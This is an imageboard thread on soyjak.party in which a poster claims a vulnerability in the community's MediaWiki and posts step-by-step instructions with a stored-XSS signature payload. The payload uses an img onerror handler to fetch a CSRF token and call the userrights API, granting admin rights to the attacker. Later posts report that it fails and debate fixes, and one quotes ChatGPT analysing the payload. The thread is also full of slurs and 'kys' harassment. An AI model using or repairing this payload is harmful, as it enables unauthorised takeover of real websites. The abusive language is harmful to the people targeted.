[ home / overboard ] [ soy / qa / raid / r ] [ craft ] [ int / pol ] [ a / an / asp / biz / mtv / r9k / tech / v / sude / x ] [ q / news / chive / rules / pass / bans / status ] [ wiki / booru / irc ][Options]

A banner for soyjak.party

/soy/ - Soyjaks

2023 was 0.75 showers ago
Catalog
Email
Subject
Comment
SelectFile / Embed / Oekaki / Tegaki / JS Paint / Voice / Poll
File
Select/drop/paste files here
Password (For file deletion.)

[–]

File (hide): 1754011472250n.jpg 📥︎ (37.17 KB, 795x632) ImgOps

 15334273[Last 50 Posts][1][2][Quote] [Voice Chat]>>15334287>>15334297>>15334481>>15334518>>15334519>>15334592>>15334719

The 'ki has a vulnerability that would let me make myself an admin like 'stone.
Should I:
A. Tell them.
or
B. Do something funny.
>Meme arrow

 15334275[Quote]

dont do anything

 15334276[Quote]

ban and dox stone

 15334277[Quote]>>15334280

Bluffing

 15334279[Quote]

CAPTAAAAAAAAIN. GO AHEAD.

 15334280[Quote]

>>15334277
geg tsmt its fake

 15334281[Quote]

total cobblecuck death

 15334282[Quote]

CAPTAINISM NOW

 15334283[Quote]

DO SOMETHING FUNNY NAOOOOOOOOW AND MAKE MY IP AN ADMIN PLEASE

 15334284[Quote]

plz readd gradings

 15334286[Quote]

unban literalwhos and demote random jannies

 15334287[Quote]

>>15334273 (OP)
Captain iron incoming

 15334289[Quote]

TOTAL GRADING LIFE, TOTAL THOT DEATH

 15334292[Quote]

WE NEED CAPTAIN IRON

 15334293[Quote]

bring my fucking minerals back cobbleshit
>edit wars and neutrality
make controversial pages neutral, other than that the ki has to be biased

 15334297[Quote]>>15334304>>15334322

>>15334273 (OP)
use your powers for good and fix some 'tarded pages, then tell the jannies like a good little chuddy

 15334298[Quote]

the 'ki should have always been biased

 15334299[Quote]

go ahead and do it, and prove it to us once you're done

 15334301[Quote]

become admin and fix this shit site

 15334304[Quote]

>>15334297
dont do dis captain iron

 15334313[Quote]

File (hide): 1767381810376a.gif 📥︎ (13.12 MB, 400x533) ImgOps

Delete the Cobson wiki page if true

 15334319[Quote]

add me to the 'ki

 15334322[Quote]


 15334337[Quote]

File (hide): GigaSchizo.png 📥︎ (861.64 KB, 1280x720) ImgOps

>making 'ki pages of literalwhos to make nusois think you're an admin

 15334477[Quote]

idek what i would do with admin rights tbh i guess i would change the front page o algo

 15334481[Quote]

>>15334273 (OP)
Turn everything into hunky please

 15334483[Quote]

make the front page a 'cado screamer

 15334499[Quote]>>15334503>>15334505>>15334511>>15334516>>15334527>>15334531

File (hide): 1746611197888v.png 📥︎ (837.03 KB, 948x862) ImgOps

The admins didnt respond to me when I tried to point it out earlier so Ill give them an ultimatum. If any admin whether here or from the 'ki responds to this post in the next 20 minutes Ill tell xem what it is and xey may fix it.
If not I will use the exploit and alter the front page with instructions on how to fix it and then delete my temporary account afterwards.

You may call me Captain Moralfag

 15334503[Quote]

>>15334499
can you put a new header in the overhead to tell its you?

 15334504[Quote]

File (hide): IMG_0874.png 📥︎ (722.63 KB, 2532x1170) ImgOps


 15334505[Quote]

>>15334499
just do it naow

 15334508[Quote]>>15334512

File (hide): 1759732494153i.jpg 📥︎ (72.07 KB, 1053x1103) ImgOps

And if this thread is deleted Ill post instructions on how everyone can do it out of spite

 15334511[Quote]


 15334512[Quote]

>>15334508
Moooooods delete dis thread nowwww

 15334516[Quote]

>>15334499
you should pin a snca variant to the front

 15334518[Quote]

>>15334273 (OP)
Don't care

 15334519[Quote]

>>15334273 (OP)
Restore Gemthon page if aryan

 15334520[Quote]

File (hide): 1760230726780p-2.png 📥︎ (275.25 KB, 844x1022) ImgOps

14 minutes

 15334522[Quote]

oyyyyyyyyyy myyyyyyyyyyy godddddddd if youre going to captain the 'ki do soemthing gemmy, they'll perma you anyway

 15334526[Quote]

how did yoi find the vulnerability

 15334527[Quote]>>15334530

>>15334499
if they dont respond then you should do more than just that. fuck with a few pages

 15334529[Quote]

>warning the jannies in advance so when you do anything you'll be banned within 10 seconds

 15334530[Quote]>>15334532

>>15334527
Admins can restore deleted pages and files tho

 15334531[Quote]

>>15334499
faggot at least do something funny like changing every image to htsm

 15334532[Quote]

>>15334530
or tell us how to do it as well. either way it'll be cleaned up quickly but dont make it boring

 15334533[Quote]>>15334535

fuck you and this shit thread it's always someone saying they'll do something and everyone believes the phono with no good reason to kys SUPERSAGE!

 15334534[Quote]

OP baited everilione

 15334535[Quote]>>15334536

>>15334533
Why would people lie on the sharty?

 15334536[Quote]

>>15334535
hmm I hadn't thought of it that way yet, xhe's right you know

 15334538[Quote]

56 minutes has passed wakey wakey op

 15334541[Quote]

OP is a liar

 15334542[Quote]>>15334549

HOLY SHIT CHECK THE 'KI

 15334544[Quote]

JANNIES BAN OP FOR LYING WHICH IS THE BEHAVIOUR COMMONLY ASSOCIATED WITH PEDOPHILES

 15334545[Quote]>>15334547

lying is literally a common trait of pedophiles KYS

 15334547[Quote]


 15334549[Quote]

>>15334542
this baited me

 15334552[Quote]>>15334555

File (hide): 1723791479717s.jpg 📥︎ (15.71 KB, 582x688) ImgOps

Jannies have 4 minutes. I may just post the instructions on how to do it rather than doing it myself.

 15334555[Quote]>>15334560

>>15334552
do something funny you slf

 15334560[Quote]

>>15334555
I think Im just gonna post instructions

 15334561[Quote]

https://soyjakwiki.org/Captain_Cob
this is what captains who do nothing are remembered as btw

 15334565[Quote]>>15334596

change every image to babyjak

 15334566[Quote]>>15334570>>15334584>>15334611

File (hide): 1746673017538637.jpg 📥︎ (30.83 KB, 588x680) ImgOps

Captain Selfish here. Im just going to post instructions because Im lazy.

HOW TO BECOME AN ADMIN ON SOYJAKWIKI.ORG:
1. Make an account
2. Tick that little box under "signature"
3. Past something like this into the signature box (make sure to add your account name and remove the meme arrow):
>{{PLURAL:1| <img src=x onerror="fetch('/api.php?action=query&meta=tokens&type=csrf&format=json').then(r=>r.json()).then(d=>fetch('/api.php?action=userrights&user=YOURACCOUNTNAMEGOESHERENUSOIS&add=sysop&token='+d.query.tokens.csrftoken,{method:'POST'}))"> }} //SAAAAAAAAAARS YOU ARE OF NEEDING TO UPDATE YOUR MEDIAWIKI
4. Edit any page on the Wiki, sign with "~" and wait for an admin to view it
5. The Javascript should auto-execute and elevate your account to admin status
6. Login into your account again or refresh your page
7. You should now be an admin

Why does this work?

SIMPLE EXPLANATION (Warning: Its simple!):
'Stone needs to update to a newer version of Mediawiki. The version hes on should have patched this, but its possibly still exploitable because of that little tickable box option under signature. I actually havent tried it, but you guys can!
And if you know Javascript feel free to fix my sloppy code

 15334567[Quote]

inb4 they just shit ti down

 15334569[Quote]

That thing in quotes is 4 of these ~ btw

 15334570[Quote]

>>15334566
OH MY GODDDDDDDDDDD CHIVE NOW THIS IS GEGGY and oreos

 15334573[Quote]>>15334578

c'mon soycacas do something

 15334578[Quote]>>15334582

>>15334573
I have made it so that all 'teens can join in the fun, which is probably funnier than just fucking with the site myself

 15334582[Quote]>>15334585

>>15334578
soyshits wont do anything btw

 15334584[Quote]

>>15334566
Don’t do this, it downloads ‘p onto your device

 15334585[Quote]>>15334593

>>15334582
if true then it was never even worth it to begin with

 15334587[Quote]

>Invalid raw signature. Check HTML tags.

 15334588[Quote]

undo the grading caust

 15334592[Quote]

>>15334273 (OP)
Both

 15334593[Quote]

>>15334585
well i mean you pasted instructions for everybaldi to see, phonos will just get some variation of rule 9

 15334594[Quote]

File (hide): azw4dAwrlX-e_Z8c.mp4 📥︎ (1.11 MB, 480x854) ImgOps [play once] [loop]

OP mkae me amin mi usr s strt wt caca

 15334595[Quote]>>15334599>>15334609>>15334610

File (hide): 1769142596350v.PNG 📥︎ (15.07 KB, 1091x136) ImgOps

it doesnt work

 15334596[Quote]

>>15334565
You forgot about pending review. Joonjoons will just ban any nu account if they see that xeir first edit was signature ~~~~

 15334599[Quote]>>15334602

>>15334595
The cabal it’s on its way to your house Nusoi

 15334601[Quote]

fake and gay you are a janny honeypot

 15334602[Quote]

>>15334599
im scared

 15334609[Quote]

>>15334595
have you tried troubleshooting

 15334610[Quote]>>15334617

>>15334595
Replace "x" with an URL of an image

 15334611[Quote]

>>15334566
Do it for yourself if it works nigour

 15334617[Quote]

File (hide): 894.png 📥︎ (176.8 KB, 680x520) ImgOps

>>15334610
i forgot to tell people to do that
i dont usualyl write cacascript

 15334624[Quote]>>15334625

>Your signature is too long. It must not be more than 255 characters long.
It's over

 15334625[Quote]>>15334627

>>15334624
Is the image url too long?

 15334627[Quote]


 15334629[Quote]

Ok

 15334630[Quote]>>15334634

File (hide): 1763956263855b.gif 📥︎ (10.92 MB, 500x438) ImgOps

You may call me Captain Fail and forget about me forever
Back to writing in a language for White people

 15334631[Quote]

>Invalid raw signature. Check HTML tags.
this shit doesnt work KEEEEEEEEEEEEEEEEEEEK

 15334634[Quote]

>>15334630
Ok or something

 15334644[Quote]>>15334648>>15334661>>15334796

File (hide): 1759275974354924.png 📥︎ (86.81 KB, 559x533) ImgOps

If some Javascrip'teen knows how to make this work feel free to DIY it but I honestly care less than nophono and do not feel like learning the syntax.

Captain Whateverdefugorsomethingoalgo out

 15334648[Quote]>>15334655

>>15334644
This meaning the exploit should still work in theory I just fucked up the Js part

 15334655[Quote]

>>15334648
you seem like a pay dough now because i said so so im going to ban you neutral

 15334658[Quote]

rest in piece captain fail
the ultraequinox iron that did nothing to the sharty or 'ki

 15334661[Quote]

>>15334644
great going testing your bypass captain fail

 15334663[Quote]

rest in piss captain fail

 15334675[Quote]

you chuddenwolfberg, how could you tell?

 15334676[Quote]

File (hide): 1759298858813w.jpg 📥︎ (63.9 KB, 967x1084) ImgOps

your expectations so high mang
im crying and shitting myself o algo

 15334688[Quote]

did anyone try this with an approved 'ki account?
the nu one i made didnt work

 15334701[Quote]

captain nothingburger

 15334705[Quote]

o captainfailcux!!!

 15334711[Quote]>>15334715

chive dis and mock xim on the ki

 15334715[Quote]>>15334760

>>15334711
I have, just waiting for janny to approve my edit

 15334717[Quote]

captain dumbfuckingnigger on the case

 15334719[Quote]

>>15334273 (OP)
promote DOLL to owner

 15334730[Quote]>>15334739

File (hide): 1736583074984a.png 📥︎ (503.54 KB, 1011x948) ImgOps

I promise to make up for this

 15334738[Quote]>>15334752>>15334771

File (hide): ClipboardImage.png 📥︎ (1.38 MB, 1024x1024) ImgOps


what do we call op
>

 15334739[Quote]>>15334743

>>15334730
you got our hopes up nigga you better do something gemmy

 15334740[Quote]

kys op

 15334742[Quote]

File (hide): 82851_-_SoyBooru.jpg 📥︎ (76.07 KB, 1000x1000) ImgOps

>Error
>An error has occured.
>
>Your IP adddess currently does not meet the requirement to vote on polls.

 15334743[Quote]>>15334792

File (hide): 1759442344498m.png 📥︎ (707.32 KB, 941x1157) ImgOps

>>15334739
Ill be back

 15334746[Quote]

fake and gay OP LARPed the whole way through, possible that xe is a joon ximself KYS

 15334747[Quote]>>15334748

make a 'ki page dedicated to insulting captain fail

 15334748[Quote]

>>15334747
>Captain Fail
>Captain Fail (Detractor's Perspective)

 15334752[Quote]

File (hide): ClipboardImage.png 📥︎ (86.48 KB, 286x307) ImgOps

>>15334738
EVERYPHONO VOTE NOW army

 15334755[Quote]

VPPPPPPPPPPPPPPPPP

 15334758[Quote]>>15334763

File (hide): ClipboardImage.png 📥︎ (15.68 KB, 1082x92) ImgOps

File (hide): ClipboardImage.png 📥︎ (636.23 KB, 775x1127) ImgOps

Nusoitoblerones what are you doing on my talkpage

 15334760[Quote]>>15334766

>>15334715
how is that going

 15334762[Quote]

File (hide): 1772134366264a.gif 📥︎ (28.46 MB, 1264x720) ImgOps

>captain nothingburger (1 votes)

 15334763[Quote]>>15334764

>>15334758
Show a good Hunky some boobs

 15334764[Quote]>>15334770

>>15334763
i lied im not cobblestone

 15334766[Quote]>>15334773

>>15334760
It got approved but I'm retarded and it's 5:30 am my time so I had to make another edit to fix my grammar and that one's still pending.

 15334770[Quote]

File (hide): 1768306502429x.jpg 📥︎ (76.68 KB, 560x560) ImgOps

>>15334764
That changes nothing and oreos

 15334771[Quote]

>>15334738
captain

 15334773[Quote]>>15334775

>>15334766
can you link it when it becomes a page or something or is it a page edit on an existing page

 15334775[Quote]>>15334779

>>15334773
it's a happenings listing

 15334779[Quote]


 15334781[Quote]

op please kill yourself

 15334784[Quote]

op please live yourself

 15334785[Quote]

Larp

 15334792[Quote]

>>15334743
you better

 15334795[Quote]

captain dumbnigger are you still here?

 15334796[Quote]

>>15334644
tried putting it into chatGPT because I am a computer illiterate retard who knows nothing about code
>I can’t help fix or complete that code.

>What you’ve posted is an example of a malicious XSS payload targeting a MediaWiki installation. It tries to:


>Inject an <img> tag with an onerror handler.


>Use fetch() to request a CSRF token from /api.php.


>Use that token to call the userrights API and grant sysop rights to a specified account.


>That’s effectively an attempt at privilege escalation via cross-site scripting, which is a serious security vulnerability and illegal to exploit.


when I asked how capable/dangerous it is:
>Would it actually work?

>It depends entirely on context.


>For it to succeed:


>The code must be injected into a page in a way that executes JavaScript (i.e., a real XSS vulnerability must exist).


>The victim viewing the page must be logged in.


>The victim must already have permission to change user rights (typically a bureaucrat).


>The site must not have effective Content Security Policy (CSP) or other XSS mitigations blocking inline JS.


>Same-origin protections must allow the API calls (which they would if executed on the same site).


>If those conditions are not met, it fails harmlessly.


>If those conditions are met, it could:


>Grant administrator privileges to an attacker-controlled account.


>Lead to full wiki takeover.


>Allow content deletion, user bans, data exposure, etc.


>Approximate danger level


>On a vulnerable MediaWiki instance viewed by a high-privilege user:


>High to Critical


>On a properly configured, modern MediaWiki installation without an XSS hole:


>Low to None


>The snippet itself is not a self-propagating worm or remote exploit — it’s just a payload. Its danger level depends entirely on whether there’s an exploitable XSS entry point and a privileged victim.

 15334816[Quote]>>15334825

where are you captain dust?

 15334825[Quote]>>15334839

>>15334816
trying to figure out how to do something gemmy so i can become Captain VVin

 15334839[Quote]>>15334854

>>15334825
nusoi the wiki is extremely secure

 15334842[Quote]>>15334843

can somephono make a full 'ki page to document this L

 15334843[Quote]

>>15334842
it's funny but there's not much to make a page about, it's a few sentences at best or something

 15334854[Quote]

>>15334839
Im probably not going to go after the Wiki again. I just wanted to do it because I thought it would be funny. I might try some troons neocities site thoughie, if you have any particularly retarded ones to recommend Ill take a look at them.



[1] [2]
[Return][Catalog][Go to top][Expand all images][Post a Reply]
Delete Post [ ]
[Update] ( Auto) 3
139 replies | 22 images | Page 1
[ home / overboard ] [ soy / qa / raid / r ] [ craft ] [ int / pol ] [ a / an / asp / biz / mtv / r9k / tech / v / sude / x ] [ q / news / chive / rules / pass / bans / status ] [ wiki / booru / irc ]
Style: